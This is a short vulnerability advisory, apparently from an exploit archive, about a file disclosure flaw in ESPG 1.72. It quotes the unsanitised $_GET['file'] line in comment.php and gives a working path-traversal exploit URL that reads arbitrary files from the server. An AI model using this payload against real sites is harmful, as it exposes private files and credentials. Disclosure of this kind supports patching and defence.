ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability

2009-01-18 07:08:02


.::ESPG 1.72 File Disclosure Vulnerability::.



=> Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

=> Vendor: http://quirm.net

=> Download: http://quirm.net/download/21/

=> Bugfounder: bd0rk

=> Contact: bd0rk[at]hackermail.com

=> Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

=> Vulnerable Code in comment.php line 3

-------------------------

$fileid = $_GET['file'];

-------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php


###The 20 years old, german Hacker bd0rk###


=> 'GAINST WAR IN ISRAEL AND GAZA!!! <=

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.